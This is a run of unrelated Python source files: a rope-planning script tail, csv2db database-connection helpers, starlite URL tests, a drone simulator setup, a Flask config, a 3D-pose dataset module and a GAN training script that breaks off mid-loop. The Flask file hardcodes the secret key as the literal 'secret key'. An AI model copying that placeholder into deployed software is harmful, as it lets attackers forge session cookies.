img_loss = F.binary_cross_entropy(img_cur.view(-1, 2500), img_goal.view(-1, 2500), reduction='mean')
print("***** Generate Next Predicted Image {}*****".format(t+1))
print("***** End Planning *****")
return action_loss, img_loss.detach().cpu().numpy()
# plan result folder name
plan_folder_name = 'curve_KL'
if not os.path.exists('./plan_result/{}'.format(plan_folder_name)):
os.makedirs('./plan_result/{}'.format(plan_folder_name))
# time step to execute the action
T = 1
# total number of samples for action sequences
N = 100
# K samples to fit multivariate gaussian distribution (N>K, K>1)
K = 50
# length of action sequence
H = 1
# model
torch.manual_seed(1)
device = torch.device("cpu")
print("Device is:", device)
recon_model = CAE().to(device)
dyn_model = SysDynamics().to(device)
# action
# load GT action
resz_act_path = './rope_dataset/rope_no_loop_all_resize_gray_clean/simplified_clean_actions_all_size50.npy'
resz_act = np.load(resz_act_path)
# checkpoint
print('***** Load Checkpoint *****')
folder_name = "test_act80_pred30"
PATH = './result/{}/checkpoint'.format(folder_name)
checkpoint = torch.load(PATH, map_location=device)
recon_model.load_state_dict(checkpoint['recon_model_state_dict'])
dyn_model.load_state_dict(checkpoint['dyn_model_state_dict'])
total_img_num = 22515
image_paths_bi = create_image_path('rope_no_loop_all_resize_gray_clean', total_img_num)
def get_image(i):
img = TF.to_tensor(Image.open(image_paths_bi[i])) > 0.3
return img.reshape((-1, 1, 50, 50)).type(torch.float)
for KL in [1000]:
action_loss_all = []
img_loss_all = []
for i in range(20000, 20010):
img_initial = get_image(i)
img_goal = get_image(i+1)
action_loss, img_loss = main(recon_model, dyn_model, T, K, N, H, img_initial, img_goal, resz_act[i], i, KL)
action_loss_all.append(action_loss)
img_loss_all.append(img_loss)
np.save('./plan_result/{}/KL_action_{}.npy'.format(plan_folder_name, KL), action_loss_all)
np.save('./plan_result/{}/KL_image_{}.npy'.format(plan_folder_name, KL), img_loss_all) |
#!/usr/bin/env python3
#
# Since: January, 2019
# Author: gvenzl
# Name: functions.py
# Description: Common functions for csv2db
#
# Copyright 2019 Gerald Venzl
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import glob
import gzip
import os
import platform
import io
import zipfile
import sys
import traceback
from enum import Enum
import csv
import config as cfg
class DBType(Enum):
"""Database type enumeration."""
ORACLE = "oracle"
ADB = "adb"
MYSQL = "mysql"
POSTGRES = "postgres"
SQLSERVER = "sqlserver"
DB2 = "db2"
class ExitCodes(Enum):
"""Program return code enumeration."""
SUCCESS = 0
GENERIC_ERROR = 1
DATABASE_ERROR = 3 # value 2 is reserved for wrong arguments passed via argparse
DATA_LOADING_ERROR = 4
class TerminalColor(Enum):
GREEN = "\x1b[32m"
RED = "\x1b[31m"
YELLOW = "\x1b[33m"
RESET = "\x1b[0m"
def open_file(file):
"""Opens a CSV file.
The file can either be in plain text (.csv), zipped (.csv.zip), or gzipped (.csv.gz)
Parameters
----------
file : str
The file to open
Returns
-------
file-object
A file object
"""
if file.endswith(".zip"):
zip_file = zipfile.ZipFile(file, mode="r")
file = zip_file.open(zip_file.infolist()[0], mode="r")
return io.TextIOWrapper(file)
elif file.endswith(".gz"):
return gzip.open(file, mode="rt")
else:
return open(file, mode='r')
def read_header(reader):
"""Reads header and returns the column list.
This function reads the first row of the CSV file and parses it for the column names.
Parameters
----------
reader : _csv.reader
The CSV Reader object to read the header from
Returns
-------
[str,]
A list with all the column names.
"""
header = []
header.extend(col.replace(' ', '_',).upper() for col in next(reader))
return header
def find_all_files(pattern):
"""Find all files of a given pattern.
Parameters
----------
pattern : str
The pattern to search for
Returns
-------
[]
List of files.
"""
if os.path.isdir(pattern):
# If path is directory find all CSV files, compressed or uncompressed
pattern += "/*.csv*"
return sorted(glob.glob(pattern))
def print_color(color, output):
"""Print colored output.
If $NO_COLOR is set then no colored output will be printed.
On Windows no colored output will be printed.
Parameters
----------
color : TerminalColor
The color to be used.
output : Any
The output to be printed
"""
if os.getenv('NO_COLOR') is None and platform.system() != "Windows":
print(color.value, end='')
print(output)
print(TerminalColor.RESET.value, end='')
else:
print(output)
def verbose(output):
"""Print verbose output.
Parameters
----------
output : Any
The output to print
"""
if cfg.verbose:
print(output)
def debug(output):
"""Print debug output.
Parameters
----------
output : Any
The output to print
"""
if cfg.debug:
if isinstance(output, list):
output = ", ".join(output)
elif isinstance(output, dict):
output = ", ".join(str(key) + ": " + str(value) for key, value in output.items())
print_color(TerminalColor.YELLOW, "DEBUG: {0}: {1}".format(datetime.datetime.now(), output))
def error(output):
"""Print error output.
Parameters
----------
output : Any
The output to be printed
"""
print_color(TerminalColor.RED, output)
def get_exception_details():
"""Return usable exception string and its traceback as string.
The string will be in the format "(Exception class name): (Exception message)"
Returns
-------
(str, traceback)
The string and traceback (as string) of the exception
"""
exception_type, exception_message, tb = sys.exc_info()
traceback_str = "Traceback:\n" + ''.join(traceback.format_tb(tb))
return "{0}: {1}".format(exception_type.__name__, exception_message), traceback_str
def get_db_connection(db_type, user, password, host, port, db_name):
""" Connects to the database.
Parameters
----------
db_type : str
The database type
user : str
The database user
password : str
The database user password
host : str
The database host or ip address
port : str
The port to connect to
db_name : str
The database or service name
Returns
-------
conn
A database connection
"""
try:
if db_type == DBType.ORACLE.value:
import cx_Oracle
conn = cx_Oracle.connect(user,
password,
host + ":" + port + "/" + db_name,
encoding="UTF-8", nencoding="UTF-8")
elif db_type == DBType.ADB.value:
import cx_Oracle
#os.environ['TNS_ADMIN'] = '/home/opc/adb'
conn = cx_Oracle.connect(user, password, db_name, encoding="UTF-8", nencoding="UTF-8")
elif db_type == DBType.MYSQL.value:
import mysql.connector
conn = mysql.connector.connect(
user=user,
password=password,
host=host,
port=int(port),
database=db_name)
elif db_type == DBType.POSTGRES.value:
import psycopg2
conn = psycopg2.connect("""user='{0}'
password='{1}'
host='{2}'
port='{3}'
dbname='{4}'""".format(user, password, host, port, db_name)
)
elif db_type == DBType.DB2.value:
import ibm_db
import ibm_db_dbi
conn = ibm_db.connect("PROTOCOL=TCPIP;AUTHENTICATION=SERVER;"
"UID={0};PWD={1};HOSTNAME={2};PORT={3};DATABASE={4};"
.format(user, password, host, port, db_name), "", "")
# Set autocommit explicitly off
ibm_db.autocommit(conn, ibm_db.SQL_AUTOCOMMIT_OFF)
return ibm_db_dbi.Connection(conn)
elif db_type == DBType.SQLSERVER.value:
import pymssql
conn = pymssql.connect(server=host, user=user, password=password, database=db_name)
# 'pymssql.Connection' object attribute 'autocommit' is read-only
conn.autocommit(False)
return conn
else:
raise ValueError("Database type '{0}' is not supported.".format(db_type))
# Set autocommit explicitly off for all database types
conn.autocommit = False
return conn
except ModuleNotFoundError as err:
raise ConnectionError("Database driver module is not installed: {0}. Please install it first.".format(str(err)))
def get_default_db_port(db_type):
"""Returns the default port for a database.
Parameters
----------
db_type : str
The database type
Returns
-------
str
The default port
"""
if db_type == DBType.ORACLE.value:
return "1521"
elif db_type == DBType.ADB.value:
return "1521"
elif db_type == DBType.MYSQL.value:
return "3306"
elif db_type == DBType.POSTGRES.value:
return "5432"
elif db_type == DBType.DB2.value:
return "50000"
elif db_type == DBType.SQLSERVER.value:
return "1433"
def get_csv_reader(file):
"""Returns a csv reader.
Parameters
----------
file : file-object
A file object
"""
return csv.reader(file, delimiter=cfg.column_separator, quotechar=cfg.quote_char)
def executemany(cur, stmt):
"""Runs executemany on the value set with the provided cursor.
This function is a wrapper around the Python Database API 'executemany'
to accommodate for psycopg2 slow 'executemany' implementation.
Parameters
----------
cur : cursor
The cursor to run the statement with
stmt : str
The SQL statement to execute on
"""
if cur is not None:
if cfg.db_type != DBType.POSTGRES.value:
cur.executemany(stmt, cfg.input_data)
else:
import psycopg2.extras as p
p.execute_batch(cur, stmt, cfg.input_data)
|
import pytest
from starlite.utils.url import join_paths, normalize_path
@pytest.mark.parametrize( # type: ignore[misc]
"base,fragment, expected",
[
("/path/", "sub", "/path/sub"),
("path/", "sub", "/path/sub"),
("path", "sub", "/path/sub"),
("/path/", "sub/", "/path/sub"),
("path/", "sub/", "/path/sub"),
("path", "sub/", "/path/sub"),
],
)
def test_join_url_fragments(base: str, fragment: str, expected: str) -> None:
assert join_paths([base, fragment]) == expected
@pytest.mark.parametrize("base,expected", [("/path", "/path"), ("path/", "/path"), ("path", "/path")]) # type: ignore[misc]
def test_normalize_path(base: str, expected: str) -> None:
assert normalize_path(base) == expected
|
###############################################################################
#
# Drone Simulator Sample Setup 1
#
# Copyright (c) 2017, Mandar Chitre
#
# This file is part of dronesim which is released under Simplified BSD License.
# See file LICENSE or go to http://www.opensource.org/licenses/BSD-3-Clause
# for full license details.
#
# Developed at the National University of Singapore (NUS)
# as part of EG1112: Engineering Principles & Practice (EPP) II
#
###############################################################################
from dronesim import *
import numpy as _np
import vpython as _vp
_size = 0.5
start_pad = _vp.box(pos=_vp.vector(0,-_size-0.1,0), length=2, height=0.22, width=2, color=_vp.color.yellow)
lift_pad = _vp.box(pos=_vp.vector(10,-_size-0.1,10), length=2, height=0.22, width=2, color=_vp.color.magenta)
end_pad = _vp.box(pos=_vp.vector(10,-_size-0.1,-10), length=2, height=0.22, width=2, color=_vp.color.cyan)
def updated_cb(drone):
if drone.xyz.y < 1 and _np.abs(drone.xyz.x-lift_pad.pos.x) < 1 and _np.abs(drone.xyz.z-lift_pad.pos.z) < 1:
drone.set_mass(1.5)
drone.body.color = _vp.color.orange
drone.set_updated_callback(updated_cb)
|
from flask import Flask
# UPLOAD_FOLDER = 'static/uploads/'
app = Flask(__name__)
app.secret_key = "secret key"
# app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024 |
import functools
import itertools
import logging
import more_itertools
import numpy as np
from attrdict import AttrDict
import util
TRAIN = 0
VALID = 1
TEST = 2
class Pose3DDataset:
def __init__(
self, joint_info, train_examples=None, valid_examples=None, test_examples=None):
self.joint_info = joint_info
self.examples = {
TRAIN: train_examples or [],
VALID: valid_examples or [],
TEST: test_examples or []}
trainval_examples = [*self.examples[TRAIN], *self.examples[VALID]]
if trainval_examples:
self.trainval_bones = self.get_mean_bones(trainval_examples)
if self.examples[TRAIN]:
self.train_bones = self.get_mean_bones(self.examples[TRAIN])
def get_mean_bones(self, examples):
coords3d = np.stack([ex.world_coords for ex in examples], axis=0)
return [
np.nanmean(np.linalg.norm(coords3d[:, i] - coords3d[:, j], axis=-1))
for i, j in self.joint_info.stick_figure_edges]
class Pose3DExample:
def __init__(
self, image_path, world_coords, bbox, camera, *,
activity_name='unknown', scene_name='unknown', mask=None, univ_coords=None):
self.image_path = image_path
self.world_coords = world_coords
self.univ_coords = univ_coords if univ_coords is not None else None
self.bbox = np.asarray(bbox)
self.camera = camera
self.activity_name = activity_name
self.scene_name = scene_name
self.mask = mask
class JointInfo:
def __init__(self, joints, edges):
if isinstance(joints, dict):
self.ids = joints
elif isinstance(joints, (list, tuple)):
self.ids = JointInfo.make_id_map(joints)
elif isinstance(joints, str):
self.ids = JointInfo.make_id_map(joints.split(','))
else:
raise Exception
self.names = list(sorted(self.ids.keys(), key=self.ids.get))
self.n_joints = len(self.ids)
if isinstance(edges, str):
self.stick_figure_edges = []
for path_str in edges.split(','):
joint_names = path_str.split('-')
for joint_name1, joint_name2 in more_itertools.pairwise(joint_names):
if joint_name1 in self.ids and joint_name2 in self.ids:
edge = (self.ids[joint_name1], self.ids[joint_name2])
self.stick_figure_edges.append(edge)
else:
self.stick_figure_edges = edges
# the index of the joint on the opposite side (e.g. maps index of left wrist to index
# of right wrist)
self.mirror_mapping = [
self.ids[JointInfo.other_side_joint_name(name)] for name in self.names]
def update_names(self, new_names):
if isinstance(new_names, str):
new_names = new_names.split(',')
self.names = new_names
new_ids = AttrDict()
for i, new_name in enumerate(new_names):
new_ids[new_name] = i
self.ids = new_ids
@staticmethod
def make_id_map(names):
return AttrDict(dict(zip(names, itertools.count())))
@staticmethod
def other_side_joint_name(name):
if name.startswith('l'):
return 'r' + name[1:]
elif name.startswith('r'):
return 'l' + name[1:]
else:
return name
def permute_joints(self, permutation):
inv_perm = util.invert_permutation(permutation)
new_names = [self.names[x] for x in permutation]
new_edges = [(inv_perm[i], inv_perm[j]) for i, j in self.stick_figure_edges]
return JointInfo(new_names, new_edges)
def make_h36m_incorrect_S9(*args, **kwargs):
import data.h36m
return data.h36m.make_h36m(*args, **kwargs, correct_S9=False)
def make_h36m(*args, **kwargs):
import data.h36m
return data.h36m.make_h36m(*args, **kwargs)
def make_h36m_partial(*args, **kwargs):
import data.h36m
return data.h36m.make_h36m(*args, **kwargs, partial_visibility=True)
def make_mpi_inf_3dhp():
import data.mpi_inf_3dhp
return data.mpi_inf_3dhp.make_mpi_inf_3dhp()
def make_mpi_inf_3dhp_correctedTS6():
import data.mpi_inf_3dhp
return data.mpi_inf_3dhp.make_mpi_inf_3dhp(ts6_corr=True)
def current_dataset():
from init import FLAGS
return get_dataset(FLAGS.dataset)
def make_merged():
joint_names = ['neck', 'nose', 'lsho', 'lelb', 'lwri', 'lhip', 'lkne', 'lank', 'rsho', 'relb',
'rwri', 'rhip', 'rkne', 'rank', 'leye', 'lear', 'reye', 'rear', 'pelv',
'htop_tdhp', 'neck_tdhp', 'rsho_tdhp', 'lsho_tdhp', 'rhip_tdhp', 'lhip_tdhp',
'spin_tdhp', 'head_tdhp', 'pelv_tdhp', 'rhip_h36m', 'lhip_h36m', 'tors_h36m',
'neck_h36m', 'head_h36m', 'htop_h36m', 'lsho_h36m', 'rsho_h36m', 'pelv_h36m',
'lhip_tdpw', 'rhip_tdpw', 'bell_tdpw', 'che1_tdpw', 'che2_tdpw', 'ltoe_tdpw',
'rtoe_tdpw', 'neck_tdpw', 'lcla_tdpw', 'rcla_tdpw', 'head_tdpw', 'lsho_tdpw',
'rsho_tdpw', 'lhan_tdpw', 'rhan_tdpw', 'pelv_tdpw']
edges = [(1, 0), (0, 18), (0, 2), (2, 3), (3, 4), (0, 8), (8, 9), (9, 10), (18, 5), (5, 6),
(6, 7), (18, 11), (11, 12), (12, 13), (15, 14), (14, 1), (17, 16), (16, 1)]
joint_info = JointInfo(joint_names, edges)
return Pose3DDataset(joint_info)
@functools.lru_cache()
def get_dataset(dataset_name):
from init import FLAGS
if dataset_name.endswith('.pkl'):
return util.load_pickle(util.ensure_absolute_path(dataset_name))
logging.debug(f'Making dataset {dataset_name}...')
kwargs = {}
def string_to_intlist(string):
return tuple(int(s) for s in string.split(','))
for subj_key in ['train_subjects', 'valid_subjects', 'test_subjects']:
if hasattr(FLAGS, subj_key) and getattr(FLAGS, subj_key):
kwargs[subj_key] = string_to_intlist(getattr(FLAGS, subj_key))
return globals()[f'make_{dataset_name}'](**kwargs)
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ops
import data
import utils
import models
import argparse
import numpy as np
import tensorflow as tf
import image_utils as im
from datetime import datetime
from dateutil import tz
from glob import glob
import os
def load_data(args):
img_ext = '/*.png'
print("Using input directories:")
if args.triplet:
dir_train_phase1 = './datasets/' + args.dataset + '/train' + args.stage1 + img_ext
dir_test_phase1 = './datasets/' + args.dataset + '/test' + args.stage1 + img_ext
print(dir_train_phase1)
print(dir_test_phase1)
a_img_paths = glob(dir_train_phase1)
a_data_pool = data.ImageData(sess, a_img_paths, args.batch_size, load_size=args.load_size, crop_size=args.crop_size)
a_test_img_paths = glob(dir_test_phase1)
a_test_pool = data.ImageData(sess, a_test_img_paths, args.batch_size, load_size=args.load_size, crop_size=args.crop_size)
else:
a_data_pool = a_test_pool = None
dir_train_phase2 = './datasets/' + args.dataset + '/train' + args.stage2 + img_ext
dir_train_phase3 = './datasets/' + args.dataset + '/train' + args.stage3 + img_ext
dir_test_phase2 = './datasets/' + args.dataset + '/test' + args.stage2 + img_ext
dir_test_phase3 = './datasets/' + args.dataset + '/test' + args.stage3 + img_ext
print(dir_train_phase2)
print(dir_train_phase3)
print(dir_test_phase2)
print(dir_test_phase3)
b_img_paths = glob(dir_train_phase2)
c_img_paths = glob(dir_train_phase3)
b_data_pool = data.ImageData(sess, b_img_paths, args.batch_size, load_size=args.load_size, crop_size=args.crop_size)
c_data_pool = data.ImageData(sess, c_img_paths, args.batch_size, load_size=args.load_size, crop_size=args.crop_size)
b_test_img_paths = glob(dir_test_phase2)
c_test_img_paths = glob(dir_test_phase3)
b_test_pool = data.ImageData(sess, b_test_img_paths, args.batch_size, load_size=args.load_size, crop_size=args.crop_size)
c_test_pool = data.ImageData(sess, c_test_img_paths, args.batch_size, load_size=args.load_size, crop_size=args.crop_size)
return a_data_pool, b_data_pool, c_data_pool, a_test_pool, b_test_pool, c_test_pool
def save_single_img(a_real_ipt, b_real_ipt, save_dir, fname, forward_mapping=True):
[a2b_opt] = sess.run([a2b if forward_mapping else b2a], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt})
sample_opt = np.array(a2b_opt)
utils.mkdir(save_dir + '/')
targetDir = '%s/%s' % (save_dir, fname)
im.imwrite(im.immerge(sample_opt,1,1), targetDir)
def training_run_id():
datetime_s = datetime.now(tz.gettz('Europe/Helsinki')).strftime(r"%y%m%d_%H%M")
return ""+datetime_s
def build_networks():
with tf.device('/gpu:%d' % args.gpu_id):
# Nodes
a_real = tf.placeholder(tf.float32, shape=[None, args.crop_size, args.crop_size, 3])
b_real = tf.placeholder(tf.float32, shape=[None, args.crop_size, args.crop_size, 3])
a2b_sample = tf.placeholder(tf.float32, shape=[None, args.crop_size, args.crop_size, 3])
b2a_sample = tf.placeholder(tf.float32, shape=[None, args.crop_size, args.crop_size, 3])
a2b1 = models.generator(a_real, 'a2b')
b2a1 = models.generator(b_real, 'b2a')
if args.transform_twice: #a-b-c
a2b = models.generator(a2b1, 'a2b', reuse=True)
b2a = models.generator(b2a1, 'b2a', reuse=True)
else:
a2b = a2b1
b2a = b2a1
b2a2b = models.generator(b2a, 'a2b', reuse=True)
a2b2a = models.generator(a2b, 'b2a', reuse=True)
if args.transform_twice: #a-b-c
b2a2b = models.generator(b2a2b, 'a2b', reuse=True)
a2b2a = models.generator(a2b2a, 'b2a', reuse=True)
# Add extra loss term to enforce the discriminator's power to discern A samples from B samples
a_dis = models.discriminator(a_real, 'a')
a_from_b_dis = models.discriminator(b_real, 'a', reuse=True) #mod1
b2a_dis = models.discriminator(b2a, 'a', reuse=True)
b2a_sample_dis = models.discriminator(b2a_sample, 'a', reuse=True)
b_dis = models.discriminator(b_real, 'b')
b_from_a_dis = models.discriminator(a_real, 'b', reuse=True) #mod1
a2b_dis = models.discriminator(a2b, 'b', reuse=True)
a2b_sample_dis = models.discriminator(a2b_sample, 'b', reuse=True)
double_cycle_loss = 0.0
if args.double_cycle: #Now making these double-processed samples belong to the same domain as 1-processed. I.e. the domains are "reflexive".
a2b_sample_dis2 = models.discriminator(models.generator(a2b_sample, 'a2b', reuse=True), 'b', reuse=True)
b2a_sample_dis2 = models.discriminator(models.generator(b2a_sample, 'b2a', reuse=True), 'a', reuse=True)
a2b2b = models.generator(a2b, 'a2b', reuse=True)
a2b2b2a = models.generator(a2b2b, 'b2a', reuse=True)
a2b2b2a2a = models.generator(a2b2b2a, 'b2a', reuse=True)
b2a2a = models.generator(b2a, 'b2a', reuse=True)
b2a2a2b = models.generator(b2a2a, 'a2b', reuse=True)
b2a2a2b2b = models.generator(b2a2a2b, 'a2b', reuse=True)
cyc_loss_a2 = tf.identity(ops.l1_loss(a_real, a2b2b2a2a) * 10.0, name='cyc_loss_a2')
cyc_loss_b2 = tf.identity(ops.l1_loss(b_real, b2a2a2b2b) * 10.0, name='cyc_loss_b2')
double_cycle_loss = cyc_loss_a2 + cyc_loss_b2
# Losses
g_loss_a2b = tf.identity(ops.l2_loss(a2b_dis, tf.ones_like(a2b_dis)), name='g_loss_a2b')
g_loss_b2a = tf.identity(ops.l2_loss(b2a_dis, tf.ones_like(b2a_dis)), name='g_loss_b2a')
cyc_loss_a = tf.identity(ops.l1_loss(a_real, a2b2a) * 10.0, name='cyc_loss_a')
cyc_loss_b = tf.identity(ops.l1_loss(b_real, b2a2b) * 10.0, name='cyc_loss_b')
g_loss = g_loss_a2b + g_loss_b2a + cyc_loss_a + cyc_loss_b + double_cycle_loss
d_loss_b2a_sample2 = d_loss_a2b_sample2 = 0.0
d_loss_a_real = ops.l2_loss(a_dis, tf.ones_like(a_dis))
d_loss_a_from_b_real = tf.identity(ops.l2_loss(a_from_b_dis, tf.zeros_like(a_from_b_dis)), name='d_loss_a_from_b') #mod1
d_loss_b2a_sample = ops.l2_loss(b2a_sample_dis, tf.zeros_like(b2a_sample_dis))
if args.double_cycle:
d_loss_b2a_sample2 = ops.l2_loss(b2a_sample_dis2, tf.zeros_like(b2a_sample_dis))
d_loss_a = tf.identity((d_loss_a_real + d_loss_b2a_sample + d_loss_b2a_sample2 + d_loss_a_from_b_real) / 3.0, name='d_loss_a')
d_loss_b_real = ops.l2_loss(b_dis, tf.ones_like(b_dis))
d_loss_b_from_a_real = tf.identity(ops.l2_loss(b_from_a_dis, tf.zeros_like(b_from_a_dis)), name='d_loss_b_from_a') #mod1
d_loss_a2b_sample = ops.l2_loss(a2b_sample_dis, tf.zeros_like(a2b_sample_dis))
if args.double_cycle:
d_loss_a2b_sample2 = ops.l2_loss(a2b_sample_dis2, tf.zeros_like(a2b_sample_dis))
d_loss_b = tf.identity((d_loss_b_real + d_loss_a2b_sample + d_loss_a2b_sample2 + d_loss_b_from_a_real) / 3.0, name='d_loss_b')
# Summaries
g_summary = ops.summary_tensors([g_loss_a2b, g_loss_b2a, cyc_loss_a, cyc_loss_b])
d_summary_a = ops.summary_tensors([d_loss_a, d_loss_a_from_b_real])
d_summary_b = ops.summary_tensors([d_loss_b, d_loss_b_from_a_real])
# Optim
t_var = tf.trainable_variables()
d_a_var = [var for var in t_var if 'a_discriminator' in var.name]
d_b_var = [var for var in t_var if 'b_discriminator' in var.name]
g_var = [var for var in t_var if 'a2b_generator' in var.name or 'b2a_generator' in var.name]
d_a_train_op = tf.train.AdamOptimizer(args.lr, beta1=0.5).minimize(d_loss_a, var_list=d_a_var)
d_b_train_op = tf.train.AdamOptimizer(args.lr, beta1=0.5).minimize(d_loss_b, var_list=d_b_var)
g_train_op = tf.train.AdamOptimizer(args.lr, beta1=0.5).minimize(g_loss, var_list=g_var)
return g_train_op, d_a_train_op, d_b_train_op, g_summary, d_summary_a, d_summary_b, a2b, a2b2a, b2a, b2a2b, a_real, b_real, a2b_sample, b2a_sample, a2b1, b2a1
def get_args():
parser = argparse.ArgumentParser(description='')
parser.add_argument('--dataset', dest='dataset', required=True, help='Dataset directory that contains the trainABC, trainDEF, trainABC and testDEF directories, where ABC and DEF stand for the stage1 and stage2 arguments')
parser.add_argument('--checkpointroot', dest='checkpointroot', default='./checkpoints', help='Directory for storing checkpoints')
parser.add_argument('--prev_checkpoint', dest='prev_checkpoint', default=None, help='Use the specific checkpoint of the form "Epoch_(256)_(1828of2337)_step_(600099)" (no ckpt).')
parser.add_argument('--load_size', dest='load_size', type=int, default=256, help='scale images to this size')
parser.add_argument('--crop_size', dest='crop_size', type=int, default=256, help='then crop to this size')
parser.add_argument('--max_epochs', dest='epoch', type=int, default=200, help='# of epochs to run')
parser.add_argument('--max_steps', dest='max_steps', type=int, default=1e9, help='# of max training steps to take')
parser.add_argument('--batch_size', dest='batch_size', type=int, default=1, help='# images in a batch')
parser.add_argument('--lr', dest='lr', type=float, default=0.0002, help='initial learning rate for adam')
parser.add_argument('--gpu_id', dest='gpu_id', type=int, default=0, help='GPU ID')
parser.add_argument('--stage1', dest='stage1', required=True, help='[dataset]/[train|test][stage-name] for stage #1, e.g. "_age_35" if your dataset is "celeb" and data is under celeb/train_age35')
parser.add_argument('--stage2', dest='stage2', required=True, help='[dataset]/[train|test][stage-name] for stage #2')
parser.add_argument('--stage3', dest='stage3', default=None, help='[dataset]/[train|test][stage-name] for stage #3')
parser.add_argument('--subnet', dest='subnet', default='', help='Sub-network to use for this transformer, with separate checkpoints')
# The special modes:
parser.add_argument('--double_cycle', dest='double_cycle', action='store_true', default='', help='Constraint to ensure that if you run a transformer twice in succession, and then twice in reverse, you get back the original.')
parser.add_argument('--triplet', dest='triplet', default='', action='store_true', help='Run the transitive transformation on both the previous and current dataset.')
parser.add_argument('--transform_twice', dest='transform_twice', action='store_true', default='', help='Run the transitive transformation twice on the source data set. Maintain consistency.')
# Tests:
parser.add_argument('--chaintestdir', dest='chaintestdir', default=None, help='Show single and double transformations for images in the given directory. Use the latest triplet weights (must exist).')
parser.add_argument('--singletestN', dest='singletestN', type=int, default=0, help='Show the given number of single transformations.')
parser.add_argument('--singletestdir', dest='singletestdir', default="", help='Input dir for the single transformation test.')
parser.add_argument('--singletestdir_out', dest='singletestdir_out', default="", help='Output dir for the single transformation test.')
parser.add_argument('--singletest_forward', dest='singletest_forward', type=int, default=1, help='Map the images to forward/backward direction (0 = backward, 1 = forward)')
parser.add_argument('--samplingcycle', dest='samplingcycle', type=int, default=0, help='How often to generate a transformed sample batch from TEST set, e.g. for age estimation.')
parser.add_argument('--online_sampling_batch_size', dest='online_sampling_batch_size', type=int, default=50, help="Number of samples for the auxiliary samples")
parser.add_argument('--save', dest='do_save', type=int, required=True, help='Save weights after training (0/1)')
args = parser.parse_args()
assert((not args.triplet) or args.stage3)
# In terms of actual variable naming, we assume the triplet mode is the standard - so that if we do not use triplets, we start from stage #2
if not args.stage3:
args.stage3 = args.stage2
args.stage2 = args.stage1
assert(args.stage2 != args.stage3)
return args
# Input args handling
args = get_args()
print(args)
do_train = (args.chaintestdir == None and args.singletestN <= 0)
print("Will train: " + str(do_train))
do_save = (args.do_save==1)
print("Will save weights after training: " + str(do_save))
singleTestOnly = len(args.singletestdir) > 0
if args.triplet:
print("Triplet enabled. You intend to apply a network trained on {}->{} on data {} while maintaining compatibility with the previous transform.".format(args.stage1, args.stage2, args.stage3))
# Network building
g_train_op, d_a_train_op, d_b_train_op, g_summary, d_summary_a, d_summary_b, a2b, a2b2a, b2a, b2a2b, a_real, b_real, a2b_sample, b2a_sample, a2b1, b2a1 = build_networks()
# Session management
config = tf.ConfigProto(allow_soft_placement=True)
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
it_cnt, update_cnt = ops.counter()
if do_train:
summary_writer = tf.summary.FileWriter('./summaries/' + args.dataset+ '/train-'+training_run_id(), sess.graph)
# Data loading
if not singleTestOnly:
a_data_pool, b_data_pool, c_data_pool, a_test_pool, b_test_pool, c_test_pool = load_data(args)
else:
single_test_input_pool = data.ImageData(sess, glob(args.singletestdir+'/*.png'), 1, load_size=args.load_size, crop_size=args.crop_size, shuffle = False, random_flip = True) #Fix the random flip problem, see data.py, then make the flip False.
b2c_pool = utils.ItemPool()
c2b_pool = utils.ItemPool()
a2b_pool = utils.ItemPool()
b2a_pool = utils.ItemPool()
# Checkpoint management.
saver = tf.train.Saver(max_to_keep=5)
# If the triplet mode is enabled, we try to load the existing checkpoint for that first.
# Otherwise, we try to load the regular checkpoint only.
subnet_maybe = ('/'+args.subnet) if len(args.subnet) > 0 else ''
subnet_ext_maybe = (subnet_maybe + ('-transitive2')) if args.transform_twice else subnet_maybe
ckpt_dir_normal = args.checkpointroot + '/' + args.dataset + subnet_maybe
ckpt_dir_ext = args.checkpointroot + '/' + args.dataset + subnet_ext_maybe
online_samples_dir = './sample_images_while_training/' + args.dataset + subnet_ext_maybe
utils.mkdir(online_samples_dir + '/')
ckpt_path = None
ckpt_dir = None
#TODO: The prev_checkpoint does not support the transform_twice directories yet
if (not do_train or not do_save) and args.prev_checkpoint:
prev_ckpt = args.prev_checkpoint+".ckpt"
print("Loading precise checkpoint {}/{}".format(ckpt_dir_normal, prev_ckpt))
saver.restore(sess, os.path.join(ckpt_dir_normal, prev_ckpt))
else:
utils.mkdir(ckpt_dir_normal + '/')
if args.transform_twice:
print("Transform-twice mode weight loading attempting...")
utils.mkdir(ckpt_dir_ext + '/')
ckpt_dir = ckpt_dir_ext
ckpt_path = utils.load_checkpoint(ckpt_dir, sess, saver)
else:
print("No Transform-twice mode weight loading attempted.")
if ckpt_path is None:
print("No Transform-twice mode weight loading done. Attempting regular weight loading...")
ckpt_dir = ckpt_dir_normal
ckpt_path = utils.load_checkpoint(ckpt_dir, sess, saver)
if ckpt_path is None:
print("No checkpoints found for loading.")
if args.transform_twice or args.triplet:
print("You requested a re-use mode but there were no existing weights of a subnet. Did you specify an existing subnet?")
sys.exit()
sess.run(tf.global_variables_initializer())
print("In the future, using checkpoint directory {}".format(ckpt_dir_normal))
else:
print('Loading checkpoint from Copy variables from % s' % ckpt_path)
if args.transform_twice:
ckpt_dir = ckpt_dir_ext
print("Saving checkpoints of this session under {}".format(ckpt_dir))
# Train / test
try:
tf_coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=tf_coord)
epoch = args.epoch
if do_train:
if not args.triplet:
batch_epoch = len(b_data_pool) // args.batch_size
else:
batch_epoch = min(len(a_data_pool), len(b_data_pool)) // args.batch_size
max_it = min(epoch * batch_epoch, args.max_steps)
last_it = -1
for it in range(sess.run(it_cnt), max_it):
sess.run(update_cnt)
last_it = it
# prepare data
b_real_ipt_orig = b_data_pool.batch()
c_real_ipt_orig = c_data_pool.batch()
matching_domain_sample_pairs = [(b_real_ipt_orig, c_real_ipt_orig)]
if args.triplet:
a_real_ipt_orig = a_data_pool.batch()
matching_domain_sample_pairs += [(a_real_ipt_orig, b_real_ipt_orig)]
